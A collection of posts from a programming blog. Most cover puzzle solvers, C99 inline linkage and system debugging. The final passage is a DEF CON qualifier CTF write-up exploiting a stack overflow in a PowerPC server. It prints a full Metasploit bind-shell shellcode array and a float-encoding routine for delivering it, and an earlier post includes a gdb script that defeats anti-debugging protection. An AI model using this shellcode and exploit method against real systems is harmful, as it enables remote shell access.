Programming – The Spoony Blog

Polyomino puzzle solver

adam — Tue, 01 Jan 2013 22:52:14 +0000

Last year’s MIT Mystery Hunt had a fun puzzle called Caterpillars which involved fitting together a bunch of polyomino pieces (laser cut by the fine folks at danger!awesome, by the way). So naturally I decided to write a program to solve it, and I was successful in that endeavor.

After the Hunt ended, I cleaned up the program, polished it, and generalized it as much as possible. The goal was to have a general-purpose polyomino solver that could solve as many different puzzles as possible. Another solver existed at the time, but it did not have any source code available, so it could not be modified to solve more general puzzles. Apparently at least one new open-source solver has appeared between then and now.

Without further ado, my polyomino solver can be found here on my GitHub, source code and all. Usage instructions can be found in the accompanying readme file.

It’s not super-efficient, but it was good enough to solve Caterpillars. If I ever get motivated enough (read: another appropriate Mystery Hunt puzzle comes along), I’ll re-architect and optimize it, but I currently have no immediate plans to do so.

Debugging a strange iTunes permissions problem with DTrace

adam — Sun, 27 Nov 2011 21:07:16 +0000

The other day, I noticed that one of my media files wouldn’t play in iTunes because it decided that my computer wasn’t authorized to play it. I could not authorize my computer to play that song, however, because the iTunes account name associated with that song no longer existed—I had changed the email address of my account in between the time that that was purchased and when I transferred it to my current computer (it was purchased prior to iTunes’ releasing all of their music DRM-free; I strongly oppose DRM).

When I attempted to re-download the track from the iTunes Store, it gave me this error message which would ordinarily be pretty helpful:

iTunes couldn’t download your purchase.

You don’t have write access for your iTunes Media folder or a folder within it. Change permissions (in the Finder) and then choose Store > Check for Available Downloads

Alas, that was not the problem. Nothing I can think of would have messed up the permissions, and find(1) confirms that all of the subdirectories there are owned by me and are readable, writable, and executable:

$ cd ~/Music/iTunes
$ find . \! -user $USER
$ find . -type d \! -perm -0700
$ # No output from the above commands

What’s going on here?

Time to dig deeper with DTrace. DTrace is a powerful debugging tool, useful for answering such questions as “What system calls is this process calling?”, “Why is the performance of my server so horrendous?” and many more. It’s like strace on crack.

But with great power comes great complexity. In order to use DTrace, you need to write a short program in the tool’s D programming language (not to be confused with that other D programming language). The program can be written on the command line or in a separate text file, but it’s still non-trivial. Some really useful examples can be found here, in addition to the various examples in the documentation.

The error message from iTunes strongly smells like a call to open(2) is failing with EACCES when iTunes tries to create the re-downloaded media file. Let’s see if that’s the case:

syscall::open*:entry
/pid == $target/
{
  printf("%s %s 0x%x 0x%x", execname, copyinstr(arg0), arg1, arg2);
}

syscall::open*:return
/pid == $target/
{
  printf("errno=%d", errno);
}

Get the PID of iTunes, start tracing it with sudo dtrace -s open.d -p $PID, and try to download the file again. Unfortunately, the output is not what I expected; errors like this get printed many times:

dtrace: error on enabled probe ID 6 (ID 120: syscall::open:return):
 invalid user access in action #2 at DIF offset 24

After a little more digging, I discovered that iTunes does not like getting debugged, which probably means it also doesn’t like getting itself traced—it just makes the debugger segfault instead. Fortunately, it’s not too hard to get around this: just turn ptrace into a no-op in iTunes when it tries to make itself undebuggable with ptrace(PT_DENY_ATTACH). Charlie Miller provides a nice gdb script for doing so:

break ptrace
condition 1 *((unsigned int *) ($esp + 4)) == 0x1f
commands 1
return
c
end

Ok, so we’re past that hurdle. Quit iTunes, restart it under gdb with this anti-anti-debugging technique, fire up DTrace again, and try to re-download the file:

CPU     ID                    FUNCTION:NAME
  0    119                       open:entry iTunes /.vol/234881026/1516872/SC Info.sidb 0xa00 0x1b6
  0    120                      open:return errno=13

Hmm. Error 13 is indeed EACCES, but what is this strange file under /.vol? Why, it’s the Volume Management file system, used by the Carbon File Manager. Using ls -al /.vol, it appears that that directory is completely empty, yet somehow other file accesses within there succeeded, as indicated in the DTrace output.
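The numbers in that trace line can be decoded by hand. The sketch below is only an illustration: the flag table is a small subset of the values in macOS's <fcntl.h>, hard-coded here because Python's own os.O_* constants reflect whatever platform the script runs on, and decode_open_flags is a made-up helper name.

```python
import errno

# Subset of open(2) flag bits as defined in macOS's <fcntl.h> (hard-coded
# assumption; not read from the running system).
MACOS_OPEN_FLAGS = {
    0x0004: "O_NONBLOCK",
    0x0008: "O_APPEND",
    0x0200: "O_CREAT",
    0x0400: "O_TRUNC",
    0x0800: "O_EXCL",
}


def decode_open_flags(flags):
    """Return the names of the known flag bits that are set in `flags`."""
    return [name for bit, name in sorted(MACOS_OPEN_FLAGS.items()) if flags & bit]


print(errno.errorcode[13])       # symbolic name for errno 13
print(decode_open_flags(0xa00))  # second argument to open() in the trace
print(oct(0x1b6))                # third argument: the creation mode, in octal
```

Read this way, the failing call is an exclusive create (O_CREAT plus O_EXCL) with mode 0666, which fits the theory that iTunes is trying to create a new file.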

I’m not sure if there’s an easy way to figure out which directory in the real file system /.vol/234881026/1516872 refers to, but a quick search for a file named “SC Info” yields two likely candidates:

$ locate -i "SC Info"
/Users/Shared/SC Info
/Users/Shared/SC Info~orig

Let’s see what those directories look like:

$ ls -la /Users/Shared/SC\ Info*
/Users/Shared/SC Info:
total 0
drwxr-xr-x   2 root  wheel   68 Jul  2  2010 .
drwxrwxrwt  10 root  wheel  340 Oct 30 22:54 ..

/Users/Shared/SC Info~orig:
total 0
drwxrwxrwx   2 adam  wheel   68 Jul  2  2010 .
drwxrwxrwt  10 root  wheel  340 Oct 30 22:54 ..

Aha! So iTunes is trying to create a file named SC Info.sidb in /Users/Shared/SC Info, but it’s failing because I don’t have write access to that directory.

The solution:

sudo chmod a+w /Users/Shared/SC\ Info

Bingo! The song now downloads successfully.

Of course, you probably could have skipped all this, googled the error message, and found this knowledge base article explaining how to fix it without too much trouble, but that’s boring. Using DTrace to debug the problem is much more fun and exciting!

Do you have any great success (or failure) stories involving DTrace?

Algebraic Crosswords

adam — Sun, 24 Apr 2011 05:59:42 +0000

A blogger by the name of T Campbell recently posted an interesting read about Algebraic Crosswords. And at the end, T posts a $100 bounty for a computer program to help crossword constructors construct such crosswords. That’s right up my alley as both a programmer and a puzzle solver, so I threw together a quick Python script to do the job.

My program, named algxword, can be downloaded from my GitHub.

The usage is as follows:

Usage: ./algxword.py [OPTIONS...] WORDLIST FROM TO

Finds all words in the file WORDLIST (which need not be sorted) which would
continue to be words when substituting the substring FROM for the substring TO.
Only words which contain FROM in them are considered.

Both FROM and TO can be empty strings.  If FROM is the empty string, then TO is
added at each position in the string to test for a word.  If TO is the empty
string, then the FROM string is simply deleted.

Ordinarily, only the first occurrence of FROM is replaced with TO.  If the -a
option is specified, then all occurrences of FROM are replaced with TO.

OPTIONS:

-a      Replaces all occurrences of FROM with TO when testing for a word
--help  Prints this help message

Examples:

# Find all words which remain words when substituting the first occurrence of
# 'qu' for 'k' in the word list /usr/share/dict/words
python algxword.py /usr/share/dict/words qu k

# Same as above, but replace all occurrences of 'qu' for 'k'
python algxword.py -a /usr/share/dict/words qu k

# Find all words which can have an 'lax' inserted in them
python algxword.py /usr/share/dict/words "" lax

More detailed instructions for the less command line-savvy can be found in the included README file.
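For readers who want a feel for the core idea, here is a minimal Python 3 sketch of the search described in the usage text. It is not the actual algxword source; the function names and the tiny word list are invented for illustration.

```python
def substitutions(word, frm, to, replace_all=False):
    """Yield each candidate produced by replacing `frm` with `to` in `word`."""
    if frm == "":
        # Empty FROM: insert TO at every position, including both ends.
        for i in range(len(word) + 1):
            yield word[:i] + to + word[i:]
    elif frm in word:
        # Non-empty FROM: replace the first occurrence, or all of them.
        yield word.replace(frm, to) if replace_all else word.replace(frm, to, 1)


def find_matches(words, frm, to, replace_all=False):
    """Return sorted (original, result) pairs where both words are in `words`."""
    wordset = set(words)
    matches = set()
    for word in wordset:
        for candidate in substitutions(word, frm, to, replace_all):
            if candidate != word and candidate in wordset:
                matches.add((word, candidate))
    return sorted(matches)


# Hypothetical word list, just for demonstration.
words = ["quit", "kit", "quack", "kack", "re", "relax", "quip"]
print(find_matches(words, "qu", "k"))
print(find_matches(words, "", "lax"))
```

Keeping the word list in a set makes each "is this still a word?" test a constant-time lookup, which is why the input file does not need to be sorted.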

UPDATE 2013-01-01:

The download location has been moved to GitHub. I also relicensed it under a BSD-like license instead of the GNU GPL.

The tricky inline specifier in C99

adam — Mon, 21 Mar 2011 04:04:18 +0000

Try to compile the following simple C program in C99 mode with GCC:

inline void foo() {}
int main(void)
{
  foo();
}

The results may surprise you:

$ gcc test.c -std=c99
/tmp/ccWN4GRh.o: In function `main':
test.c:(.text+0xa): undefined reference to `foo'
collect2: ld returned 1 exit status

Huh? The function’s right there!

Well it turns out that this is not a bug in GCC, but a peculiarity in the way the inline keyword is defined by the C99 standard. Basically, a function declared inline without either of the extern or static linkage specifiers only creates an inline definition of that function, not an external definition.

When presented with a call to such a function, the compiler can choose to call either the inline definition or the external definition. If it chooses the external definition, and such an external definition doesn’t exist, we get a linker error, as in the above example. In the dry words of the standard:

ISO/IEC 9899:1999 §6.7.4/6:

Any function with internal linkage can be an inline function. For a function with external linkage, the following restrictions apply: If a function is declared with an inline function specifier, then it shall also be defined in the same translation unit. If all of the file scope declarations for a function in a translation unit include the inline function specifier without extern, then the definition in that translation unit is an inline definition. An inline definition does not provide an external definition for the function, and does not forbid an external definition in another translation unit. An inline definition provides an alternative to an external definition, which a translator may use to implement any call to the function in the same translation unit. It is unspecified whether a call to the function uses the inline definition or the external definition.

So there are three ways to fix this code:

1. Give foo internal linkage (by declaring it static) and avoid the above clause entirely
2. Declare foo as extern
3. Provide a separate external definition for foo in another translation unit (that is, another source file)

I would strongly recommend against solution #3, since then your code base will have two separate definitions of foo, which will be very confusing for people reading your code. It’s very easy for them to get out of sync, if somebody changes one definition but forgets to change the other, which makes for some insidious bugs (such as working correctly in a debug build but not in a release build, or vice-versa).

If your inline function is defined and used only in one source file (as in our toy example), solution #1 is the way to go: just give it internal linkage. No reason to make it world-accessible.

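Conversely, if your inline function is defined in a header file so it can be used throughout your code, it makes more sense to give it external linkage. Go with solution #2, keeping in mind that in C99 an extern inline definition is an external definition, so it should appear in exactly one translation unit (every other file that includes the header sees only the plain inline definition); otherwise the linker will complain about duplicate definitions of foo: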

extern inline void foo() { /* body */ }

The Unkillable Window

adam — Wed, 08 Sep 2010 05:56:36 +0000

I recently ran into a very strange occurrence on my Windows box: an unkillable window. I was rebooting after installing some software that required a reboot (*sigh*) and noticed that the restart didn’t quite happen—most of my processes were killed, but there was this leftover window that wouldn’t go away. Further attempts to reboot did not result in any obvious effect, and the window refused to be closed by any normal method (though it happily moved around).

I also couldn’t start any new processes (such as a debugger); Windows wouldn’t let me because the system was shutting down. Oof. Fortunately, I did have a copy of Process Explorer already running. Process Explorer has a nifty tool where you can drag this icon (the circle-cross icon adjacent to the binoculars) onto any window, and it will tell you what process that window belongs to. I assume it uses GetWindowThreadProcessId(). However, doing this gave a curious error, something like “this window does not belong to any process”; I forget the exact wording since I didn’t write it down.

At this point, I was ready to pull the plug, but I decided to try one more thing: I started killing processes willy-nilly. When I killed services.exe, Windows got kinda upset and told me that it would be shutting down in 60 seconds because a critical process was killed, which was perfectly fine with me. But 60 seconds passed by, and Windows still did not shut down. I then killed winlogon.exe, which promptly BSOD’ed me.

I don’t remember exactly what I did to create the unkillable window, but it went something like this: I was simultaneously debugging two copies of a particular executable, one with Visual Studio 2008 and one with WinDbg. I also at one point set the Image File Execution Options debugger key for that executable to point to vsjitdebugger.exe, and I may have deleted that registry key during my debugging sessions. The unkillable window was the console window from the debuggee of one of those debugging sessions (not sure which), and it somehow persisted after killing the debugger.

Does anyone have any ideas on what exactly can cause such an unkillable window not owned by any process to appear? And if it does appear, how can it be killed without hard rebooting? It’s too bad Raymond Chen’s suggestion box is closed; otherwise this would be going right in there. Raymond, if you’re out there, your input would be greatly appreciated on this matter.

Kakuro Solver

adam — Thu, 01 Jul 2010 05:18:06 +0000

Kakuro (also known as Cross Sums) is a popular number-based logic puzzle. It resembles crossword puzzles, except instead of clues made up of words, you have clues made up of numbers indicating the sum of the digits in the indicated cells, with the additional constraint that no entry contain the same digit more than once.

The MIT Mystery Hunt is no stranger to Kakuros. It has featured a number of Kakuro variants over the years, most of which involve some special trick or gimmick not present in a standard Kakuro puzzle. Of course, figuring that out is part of the puzzle.

The 2009 Hunt featured an intriguing puzzle named Cross Something-Or-Others, by Thomas Snyder and Dan Katz. It had 8 different Kakuro variants (Nonsense Kakuro does not count). After the Hunt was over, I decided to write a generic, optimized Kakuro solver that could solve all of these variants for help with future Hunts. Although I did not get to use my solver during the 2010 Hunt (I missed whatever Kakuros there were, if there were any at all), I hope this will be useful for puzzle solvers present and future.

There are many other solvers out there, but none of them was adequate for me. They all had various issues: some had no source code (making solving variants impossible), some had a horrendous interface for inputting puzzles, some weren’t portable enough, and some were too slow.

Actually, I probably could have gone with zvrba’s solver and modified it, but I decided to start from scratch anyways. “There are many like it, but this one is mine”, as the saying goes.

So anyways, back to my solver. I wrote it from the ground up to be blazing fast. It stores the set of possible values a cell can have using a bit set, and it uses some inline assembly (specifically the x86’s BSF and BSR instructions). So, it’s not completely portable out-of-the-box, but those can be replaced easily enough with generic C routines that will be slower, or the equivalent instructions on other ISAs. It also uses the pthreads library for multithreading. If you want to compile it for a platform that does not support pthreads (such as Windows), you can either replace pthreads with your platform’s equivalent, or nuke the threading support entirely. But other than those two things, the program is completely portable C.
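To illustrate the bit-set idea without the inline assembly, here is a small Python sketch. It is an assumption-laden stand-in rather than the solver's real code: the function names are invented, and Python integers play the role of the machine word. Bit d being set means "digit d is still possible for this cell".

```python
def lowest_value(mask):
    """Index of the lowest set bit (what BSF computes): the smallest candidate.

    Assumes mask is nonzero.
    """
    return (mask & -mask).bit_length() - 1


def highest_value(mask):
    """Index of the highest set bit (what BSR computes): the largest candidate.

    Assumes mask is nonzero.
    """
    return mask.bit_length() - 1


def values(mask):
    """List every candidate in the set, smallest first."""
    out = []
    while mask:
        out.append(lowest_value(mask))
        mask &= mask - 1  # clear the lowest set bit
    return out


ALL_DIGITS = sum(1 << d for d in range(1, 10))  # standard Kakuro: 1 through 9
print(lowest_value(ALL_DIGITS), highest_value(ALL_DIGITS))
print(values(0b101000))
```

With this representation, eliminating a digit is a single AND with an inverted mask, and the minimum and maximum needed by the solving rule each cost one bit-scan.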

Secondly, I also designed the solver to be as generic as possible, in order to be able to solve (or be modified to solve) as many different Kakuro variants as possible. The most flexible piece is the set of allowable numbers in a cell. In standard Kakuro, that set of numbers is 1–9. Common variants include allowing 0, or changing the base to make something like hexadecimal Kakuro (1–15). My solver allows any subset of the numbers 0–30; it could easily be modified to use a subset of 0–63, but I haven’t bothered with that yet, since extending that support might slow it down a little (probably not very much though) on 32-bit machines, and I’ve never seen a puzzle that uses cells with numbers that large.

I also coded up modifications to solve most of the variants in the puzzles linked to above. Again, for maximal speed, the logic in these variants is controlled by various #defines, producing separate binaries for each of them.

So how does it work? Under the hood, it’s got one simple rule, followed by a brute-force search. That one rule is:

The minimum possible value for a cell is given by the total sum of the numbers in the entry (the clue) minus the sum of the maximum possible values of all of the other cells in the entry
The maximum possible value for a cell is given by the total sum minus the sum of the minimum possible values of all of the other cells in the entry

It turns out that this is often all you need, especially for simple puzzles. This does not try to enumerate all possible sets of values for an entry. In other words, for a 2-cell clue with a sum of 4, it does not deduce that 2 is not a possible value for either cell. It only determines that 1–3 are legal values, since the maximum is 4 (the sum) minus 1 (the minimum value for the other cell), which is 3.
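The rule is easy to sketch in a few lines of Python. This is a simplified illustration using plain sets instead of the solver's bit sets, and tighten is a name I made up; it assumes every cell still has at least one candidate.

```python
def tighten(clue, cells):
    """Apply the min/max rule once to a single entry.

    `cells` is a list of non-empty sets of candidate values, one per cell.
    Returns a new list of narrowed candidate sets.
    """
    lows = [min(c) for c in cells]
    highs = [max(c) for c in cells]
    result = []
    for i, candidates in enumerate(cells):
        # Smallest allowed value: clue minus the maxima of all other cells.
        lo = clue - (sum(highs) - highs[i])
        # Largest allowed value: clue minus the minima of all other cells.
        hi = clue - (sum(lows) - lows[i])
        result.append({v for v in candidates if lo <= v <= hi})
    return result


two_cells = [set(range(1, 10)), set(range(1, 10))]
print(tighten(4, two_cells))   # the 2-cell, sum-4 example from the text
print(tighten(17, two_cells))
```

For the sum-4 example, both cells come out as {1, 2, 3}: the 2 survives, exactly as described, because the rule only looks at bounds and never at the no-repeated-digit constraint.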

It also performs other logic which I consider so obvious that it shouldn’t need stating, but here it is anyways: if a cell can only contain one number, then all other cells in the two entries that go through that cell cannot take on that value.

It repeats this logic for every cell for every clue in both the across and down directions as long as it continues to make progress by eliminating numbers as possible values for cells. If you’re lucky, it might solve the entire puzzle this way (this is very fast). If you’re not so lucky, it starts a brute-force depth-first search of the entire remaining puzzle space and attempts to enumerate all possible solutions.

The brute-force search isn’t a dumb search, though. It picks one cell, iterates through all possible allowed values for that cell, and recurses. The cell that it picks is one that belongs to the entry that has the fewest possible total values, which is computed as the product of the number of values of each cell in that entry; once the entry is determined, the first cell with more than one possible value is used. The idea here is that for incorrect guesses (which most are), we want to reach a contradiction as quickly as possible, which we try to do by picking an entry with a small number of possibilities. In my tests, this usually seems to give vastly better results, but not always, when compared to just picking the first cell that can have multiple values.
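Here is one way the cell-picking heuristic could look in Python. It is a sketch under my own assumptions, not the solver's code: entries are lists of cell identifiers, candidates maps each cell to its set of possible values, and entries whose cells are all already decided are skipped (the post does not say how those are handled).

```python
from math import prod


def pick_cell(entries, candidates):
    """Choose the next cell to guess, or None if every cell is decided.

    entries:    list of entries, each a list of cell ids
    candidates: dict mapping cell id -> set of possible values
    """
    best_entry = None
    best_size = None
    for entry in entries:
        if all(len(candidates[c]) == 1 for c in entry):
            continue  # nothing left to guess in this entry
        # Upper bound on fillings: product of per-cell candidate counts.
        size = prod(len(candidates[c]) for c in entry)
        if best_size is None or size < best_size:
            best_entry, best_size = entry, size
    if best_entry is None:
        return None
    # Within the chosen entry, take the first undecided cell.
    return next(c for c in best_entry if len(candidates[c]) > 1)


entries = [["a", "b"], ["c", "d"]]
candidates = {"a": {1, 2, 3}, "b": {1, 2, 3}, "c": {5}, "d": {1, 2}}
print(pick_cell(entries, candidates))
```

In this toy grid the first entry has 9 possible fillings and the second only 2, so the search branches on cell "d" first.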

Ok, enough with the discussion, you’ve been patient enough. You can download my Kakuro solver’s source code here. It’s licensed under the GPL version 3 or later. Comments are most welcome!

I’ll take Pwtent Pwnables for 400 please, Alex

adam — Thu, 27 May 2010 03:11:21 +0000

This past weekend, I participated in my first ever DEF CON Capture the Flag Qualifying Tournament. CTF is a contest at the aforementioned annual hacker conference where the goal is to keep your team’s network services (which are on a closed intranet) up and running for as long as possible, while simultaneously trying to bring down your opponents’ network services. The qualifying tournament is an open tournament to determine the special few who will get to play CTF.

The categories in this year’s quals were Persuits Trivial, Crypto Badness, Packet Madness, Binary L33tness, Pwtent Pwnables, and Forensics, laid out in a Jeopardy!-style grid. There were 5 challenges in each category, worth 100 through 500 points respectively. I spent a fair amount of time working on Pwtent Pwnables (note that this contest was a team contest), and though I didn’t solve it during the contest, I managed to get a working exploit after the contest ended. Here’s a writeup of my work.

For this problem, you’re given this file and told that it’s running on pwnie.ddtek.biz. Go.

A quick file(1) says that this is a Mach-O executable ppc. strings(1) suggests that it’s binding to a port and listening on a socket. It receives some floating-point numbers, computes the average and standard deviation of those numbers, and sends the results back. The text includes “max of 16”, suggesting an obvious buffer overflow attack.

Let’s take a look at the disassembly and see what we can figure out. Fire up objdump, part of the binutils distribution:

$ objdump -d pp400_8c9d628d2144bbe8b.bin -s > pp400.s

Hmm. Not a lot to work with here. No symbols, and the convoluted dynamic linking makes it extremely difficult to even see what the calls to dynamically linked functions are. Here’s what the stub for calling fork(2) looks like:

    3d80:   7c 08 02 a6     mflr    r0
    3d84:   42 9f 00 05     bcl-    20,4*cr7+so,3d88 
    3d88:   7d 68 02 a6     mflr    r11
    3d8c:   3d 6b 00 00     addis   r11,r11,0
    3d90:   7c 08 03 a6     mtlr    r0
    3d94:   85 8b 03 18     lwzu    r12,792(r11)
    3d98:   7d 89 03 a6     mtctr   r12
    3d9c:   4e 80 04 20     bctr

Can you tell that’s a fork? I sure can’t. The bcl grabs the current instruction address (0x3d88), and then after some bookkeeping, the value at address 0x3d88 + 792 (792 is decimal, 0x318 in hex), that is 0x40a0, is loaded and then branched to. The memory at 0x40a0 is in the data segment in a stream of .long 0x2428, which presumably get replaced at load time with the actual addresses of the dynamically linked functions. How exactly that works, though, is still a mystery to me.

Disassembling it isn’t all that helpful right now, so maybe we can try running it to figure out what it does. I don’t have a PowerPC Mac, but thanks to Rosetta, I can run the program seamlessly on my x86 Mac:

$ chmod a+x pp400_8c9d628d2144bbe8b.bin
$ ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted

Well drat. It looks like it’s trying to drop privileges (a standard procedure to minimize risk in socket-based applications), but it’s failing somehow. What’s it trying to do? Let’s see with ktrace (aside: DTrace is far superior to ktrace but only available on OS X v10.5 and up; if you’re still running 10.4 like I am, then ktrace is your best option).

$ ktrace ./pp400_8c9d628d2144bbe8b.bin
pp400_8c9d628d2144bbe8b.bin: drop_privs failed!
: Operation not permitted
$ kdump | less

Looking through the log, we see calls to socket(2), setsockopt(2), bind(2), and listen(2), a standard sequence for a simple server. The failure here comes from calls to setgroups(2) and setgid(2):

  8972 pp400_8c9d628d21 CALL  setgroups(0x1,0xb7fff958)
  8972 pp400_8c9d628d21 RET   setgroups -1 errno 1 Operation not permitted
  8972 pp400_8c9d628d21 CALL  setgid(0x1f8)
  8972 pp400_8c9d628d21 RET   setgid -1 errno 1 Operation not permitted

Well hmph, I’m stumped. The man pages here (and yes I realize I’m mixing links to the Linux and OS X man pages; it doesn’t really matter, they say mostly the same things since this is all POSIX) say that setgroups() will only succeed if run as root, and setgid() can only do trivial things as non-root. I’m definitely not going to run this as root, and the contest server sure as hell won’t be running as root.

At this point, I cheated (sort of). I noticed that this program was doing essentially the same things as an earlier problem in the contest, namely pp100. That problem was a program which also ran a server of sorts, but it was an ELF for FreeBSD. The difference there was that it included some sort of symbols in it, so disassembling it was incredibly helpful: there were useful function names, and it was obvious which system calls were being made and where. And in that program, I noticed that it was grabbing a username (digger) out of the data segment and calling drop_privs_user() with that username.

Armed with that knowledge and taking another look at the data segment of pp400, we see the string “luser” near the beginning. That looks promising. So, create a new user on your Mac named luser and try again.

Nope, same error. Maybe if we try running the program as luser?

$ su luser
Password:
$ ./pp400_8c9d628d2144bbe8b.bin

Success! It’s now listening on a socket. But on what port? lsof(8) to the rescue!

$ lsof -i  # Must be run as luser (or as root)
COMMAND    PID  USER   FD   TYPE    DEVICE SIZE/OFF NODE NAME
pp400_8c9 9254 luser    4u  IPv4 0x689bc9c      0t0  TCP *:nettest (LISTEN)

It’s listening on the nettest port; if we grep for that in /etc/services, we find that that corresponds to port 4138. So let’s try that out:

$ telnet localhost 4138
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Send me some floats (max of 16), I will tell you some stats!
1 2 3^D
The average of your 3 numbers is 2.000000
The standard deviation of your 3 numbers is 0.816497
Connection closed by foreign host.

It took a bit of experimentation, but I eventually figured out that the server didn’t compute and return results unless you sent a literal ^D (EOF) character. Let’s send a gazillion numbers and see what happens:

$ python -c 'print " ".join(map(str, range(10000))), "\4"' | nc localhost 4138
Send me some floats (max of 16), I will tell you some stats!
$

Yep, it crashed all right. Now let’s exploit it. The first step is figuring out where in memory the buffer of floats is being stored. Normally we could just attach a debugger and figure it out, but debugging a process running under Rosetta is not trivial. Fortunately, it is possible: a little googling leads one to this blog post and the Universal Binary Programming Guidelines, which detail the procedure. Run the binary with the OAH_GDB environment variable set, and then in another shell, run gdb --oah, attach to the process, and continue:

# First shell
$ OAH_GDB=YES ./pp400_8c9d628d2144bbe8b.bin
Starting Unix GDB Session
Listening

# Second shell (must be luser or root)
$ gdb --oah
(gdb) attach pp400_8c9d628d21.9453
(gdb) c

Unfortunately, it seems that the follow-fork-mode option for GDB does not work on OS X, so if you attempt to set it, you’ll find that you’re still attached to the parent process regardless of its setting. But fortunately, if the child process crashes, gdb still manages to halt when the crash occurs and inspect the program state. Run the earlier Python one-liner to crash the child process:

Program received signal SIGSEGV, Segmentation fault.
0x000033f8 in ?? ()
(gdb) disas $pc-20 $pc+20
Dump of assembler code from 0x33e4 to 0x340c:
0x000033e4:     lfs     f0,128(r30)
0x000033e8:     rlwinm  r2,r0,2,0,29
0x000033ec:     addi    r0,r30,56
0x000033f0:     add     r2,r2,r0
0x000033f4:     addi    r2,r2,8
0x000033f8:     stfs    f0,0(r2)
0x000033fc:     lwz     r2,60(r30)
0x00003400:     addi    r0,r2,1
0x00003404:     stw     r0,60(r30)
0x00003408:     addi    r0,r30,128
End of assembler dump.
(gdb) p/x $r2
$1 = 0xc0000000
(gdb) p/x $sp
$2 = 0xbffff400
(gdb) x/32x $r2-128
0xbfffff80:     0x44340000      0x44344000      0x44348000      0x4434c000
0xbfffff90:     0x44350000      0x44354000      0x44358000      0x4435c000
0xbfffffa0:     0x44360000      0x44364000      0x44368000      0x4436c000
0xbfffffb0:     0x44370000      0x44374000      0x44378000      0x4437c000
0xbfffffc0:     0x44380000      0x44384000      0x44388000      0x4438c000
0xbfffffd0:     0x44390000      0x44394000      0x44398000      0x4439c000
0xbfffffe0:     0x443a0000      0x443a4000      0x443a8000      0x443ac000
0xbffffff0:     0x443b0000      0x443b4000      0x443b8000      0x443bc000

What happened here is we walked off the stack: we just kept copying into the stack buffer all the way up the stack, which started at 0xbffffffc. We can clearly see the increasing set of floating-point numbers filling the end of the stack. Using this handy dandy IEEE 754 calculator, we see that 0x44340000 is the float 720, which means the buffer started at 0xbfffff80 – 720*4 = 0xbffff440, which at this point is $sp+0x40.
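If you don't have an IEEE 754 calculator handy, the same arithmetic can be checked with Python's struct module. This is just a sketch of the calculation above; word_to_float is an illustrative helper name, and it relies on the fact that the one-liner sent 0, 1, 2, ..., so each stored value equals its index in the buffer.

```python
import struct


def word_to_float(word):
    """Reinterpret a 32-bit integer as a big-endian IEEE 754 single."""
    return struct.unpack(">f", struct.pack(">I", word))[0]


first_visible = word_to_float(0x44340000)  # the word stored at 0xbfffff80
# Each float is 4 bytes and the value equals the index, so step back
# index * 4 bytes to find where element 0 lives.
buffer_start = 0xbfffff80 - int(first_visible) * 4
stack_pointer = 0xbffff400                 # $sp from the gdb session

print(first_visible)
print(hex(buffer_start))
print(hex(buffer_start - stack_pointer))
```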

To exploit this now, we need to put our payload on the stack and then overwrite a return address with the proper stack address so we jump into the payload. We also can’t write more than about 751 numbers, since we’d crash before we got to the payload as we did just here, but fortunately this isn’t a problem.

Now let’s figure out where in the payload the stack address needs to go. Restart the server, reattach gdb, and rerun the Python one-liner with only 100 numbers instead of 10000. The result:

Program received signal SIGSEGV, Segmentation fault.
0x41d00000 in ?? ()

The program counter ended up at 0x41d00000, which is the float 26. So, we need to place our pointer into the payload in the 27th number; the first 26 can be anything.

For the payload itself, start with the osx/ppc/shell_bind_tcp payload from Metasploit:

$ msfconsole
msf > use osx/ppc/shell_bind_tcp
msf payload(shell_bind_tcp) > generate -t c
/*
 * osx/ppc/shell_bind_tcp - 224 bytes
 * http://www.metasploit.com
 * AutoRunScript=, AppendExit=false, PrependSetresuid=false, 
 * InitialAutoRunScript=, PrependSetuid=false, LPORT=4444, 
 * RHOST=, PrependSetreuid=false
 */
unsigned char buf[] = 
"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00"
"\x61\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00"
"\x00\x0d\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38"
"\xa0\x00\x10\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02"
"\x7c\x00\x02\x78\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80"
"\x00\x10\x90\x81\xff\xe8\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44"
"\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x38\xa0\x00\x02"
"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00"
"\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82"
"\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c"
"\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x28"
"\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00"
"\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78\x7f\xe0"
"\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00";

We can’t just send the payload as-is, though. We have to send it as floats which then get sscanf’ed into the raw binary. So we need to take the payload, group it into 4-byte units, convert those to floats, and print those out as strings, being careful that the resulting strings reconvert back properly. PowerPC instructions are fixed at 4 bytes, which is convenient in this case. I did that with this little C snippet:

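#include <stdio.h>

/* Print a 32-bit opcode as decimal float text, flagging any value that
   does not survive a print-and-reparse round trip. */
void emit(unsigned int op)
{
  char buf[256];

  /* Reinterpret the opcode's bits as a float */
  union
  {
    unsigned int op;
    float f;
  } u;

  float g;

  u.op = op;
  sprintf(buf, "%64.64f", u.f);
  /* NaN never compares equal to itself, so NaN encodings land here too */
  if(sscanf(buf, "%f", &g) != 1 || g != u.f)
    printf("***BAD*** 0x%08x (%s)\n", u.op, buf);
  else
    printf("%s\n", buf);
}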

Trying it out, we see a couple of the opcodes from the payload don’t encode properly: 7fc3f378 (mr r3,r30) and 7fe00008 (trap). Why? Well, these correspond to encodings of NaN. If you try and sscanf back the string “nan”, you’re not going to get those values back.
